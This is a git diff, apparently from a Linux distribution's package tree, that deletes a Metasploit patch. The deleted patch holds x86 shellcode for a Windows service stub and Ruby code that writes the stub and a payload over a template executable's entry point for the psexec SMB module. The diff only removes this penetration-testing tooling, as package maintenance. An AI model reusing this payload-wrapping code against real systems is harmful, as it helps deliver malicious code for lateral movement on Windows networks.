1 files changed, 0 insertions, 219 deletions
diff --git a/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch b/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
deleted file mode 100644
index 4f2e353ecb..0000000000
--- a/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch
+++ /dev/null
@@ -1,219 +0,0 @@
-diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
---- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm	1970-01-01 01:00:00.000000000 +0100
-+++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm	2013-11-20 11:50:48.256366095 +0100
-@@ -0,0 +1,64 @@
-+;-----------------------------------------------------------------------------;
-+; Author: agix (florian.gaultier[at]gmail[dot]com)
-+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-+; Size: 137 bytes
-+;-----------------------------------------------------------------------------;
-+
-+[BITS 32]
-+; Input: EBP must be the address of 'api_call'.
-+
-+push byte 0x0
-+push 0x32336970
-+push 0x61766461
-+push esp
-+push 0x726774c
-+call ebp		;load advapi32.dll
-+push 0x00454349
-+push 0x56524553
-+mov ecx, esp	;ServiceTableEntry.SVCNAME
-+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
-+push 0x00000000
-+push eax
-+push ecx
-+mov eax,esp
-+push 0x00000000
-+push eax
-+push 0xCB72F7FA
-+call ebp		;call StartServiceCtrlDispatcherA(ServiceTableEntry)
-+push 0x00000000
-+push 0x56A2B5F0
-+call ebp		;call ExitProcess(0)
-+pop eax			;SvcCtrlHandler
-+pop eax
-+pop eax
-+pop eax
-+xor eax,eax
-+ret
-+cld 			;SvcMain
-+call me
-+me:
-+pop ebp
-+sub ebp, 0xd6	;ebp => hashFunction
-+push 0x00464349
-+push 0x56524553
-+mov ecx, esp	;SVCNAME
-+lea eax, [ebp+0xc9];SvcCtrlHandler
-+push 0x00000000
-+push eax
-+push ecx
-+push 0x5244AA0B
-+call ebp		;RegisterServiceCtrlHandlerExA
-+push 0x00000000
-+push 0x00000000
-+push 0x00000000
-+push 0x00000000
-+push 0x00000000
-+push 0x00000000
-+push 0x00000004
-+push 0x00000010
-+mov ecx, esp
-+push 0x00000000
-+push ecx
-+push eax
-+push 0x7D3755C6
-+call ebp		;SetServiceStatus RUNNING
-\ No newline at end of file
-diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
---- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	1970-01-01 01:00:00.000000000 +0100
-+++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	2013-11-20 11:50:48.256366095 +0100
-@@ -0,0 +1,17 @@
-+;-----------------------------------------------------------------------------;
-+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
-+; Version: 1.0 (28 July 2009)
-+; Size: 189 bytes + strlen(libpath) + 1
-+; Build: >build.py single_service_stuff
-+;-----------------------------------------------------------------------------;
-+
-+[BITS 32]
-+[ORG 0]
-+
-+  cld                    ; Clear the direction flag.
-+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
-+%include "./src/block/block_api.asm"
-+start:                   ;
-+  pop ebp                ; pop off the address of 'api_call' for calling later.
-+%include "./src/block/block_service.asm"
-\ No newline at end of file
-diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
---- metasploit-9999.orig/lib/msf/util/exe.rb	2013-11-20 11:50:31.748365346 +0100
-+++ metasploit-9999/lib/msf/util/exe.rb	2013-11-20 11:50:48.256366095 +0100
-@@ -402,36 +402,86 @@
- 
-     case opts[:exe_type]
-       when :service_exe
-+        exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
-         max_length = 8192
-         name = opts[:servicename]
- 
--        if name
--          bo = pe.index('SERVICENAME')
--          raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
--          pe[bo, 11] = [name].pack('a11')
-+        if not name
-+          name = Rex::Text.rand_text_alpha(7)
-         end
--
--        if not opts[:sub_method]
--          pe[136, 4] = [rand(0x100000000)].pack('V')
-+        #code_service could be encoded in the future
-+        code_service =
-+        "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-+        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-+        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-+        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-+        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-+        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-+        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-+        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-+        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-+        "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
-+        "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
-+        "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
-+        "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
-+        "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
-+        "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
-+        "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
-+        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
-+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
-+
-+        pe_header_size=0x18
-+        section_size=0x28
-+        characteristics_offset=0x24
-+        virtualAddress_offset=0xc
-+        sizeOfRawData_offset=0x10
-+
-+        sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
-+        sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
-+        sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
-+
-+        sections_header = []
-+        exe._file_header.v['NumberOfSections'].times { |i|
-+          sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
-+        }
-+
-+        #look for section with entry point
-+        sections_header.each do |sec|
-+          virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
-+          sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
-+          characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
-+          if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
-+            #put this section writable
-+            characteristics|=0x80000000
-+            newcharacteristics = [characteristics].pack('L')
-+            pe[sec[0],newcharacteristics.length]=newcharacteristics
-+          end
-         end
-+
-+        #put the shellcode at the entry point, overwriting template
-+        pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
-+
-       when :dll
-         max_length = 2048
-       when :exe_sub
-         max_length = 4096
-     end
- 
--    bo = pe.index('PAYLOAD:')
--    raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
-+    if opts[:exe_type] != :service_exe
- 
--    if (code.length <= max_length)
--      pe[bo, code.length] = [code].pack("a*")
--    else
--      raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
--    end
-+      bo = pe.index('PAYLOAD:')
-+      raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
- 
--    if opts[:exe_type] == :dll
--      mt = pe.index('MUTEX!!!')
--      pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
-+      if (code.length <= max_length)
-+        pe[bo, code.length] = [code].pack("a*")
-+      else
-+        raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
-+      end
-+
-+      if opts[:exe_type] == :dll
-+        mt = pe.index('MUTEX!!!')
-+        pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
-+      end
-     end
- 
-     return pe
-@@ -463,7 +513,7 @@
- 
-   def self.to_win32pe_service(framework, code, opts={})
-     # Allow the user to specify their own service EXE template
--    set_template_default(opts, "template_x86_windows_svc.exe")
-+    set_template_default(opts, "template_x86_windows.exe")
-     opts[:exe_type] = :service_exe
-     exe_sub_method(code,opts)
-   end
-diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
---- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:31.988365357 +0100
-+++ metasploit-9999/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:48.256366095 +0100
-@@ -153,7 +153,7 @@
-       # Disconnect from the ADMIN$
-       simple.disconnect("ADMIN$")
-     else
--      servicename = rand_text_alpha(8)
-+      servicename = rand_text_alpha(7)
- 
-       # Upload the shellcode to a file
-       print_status("Uploading payload...")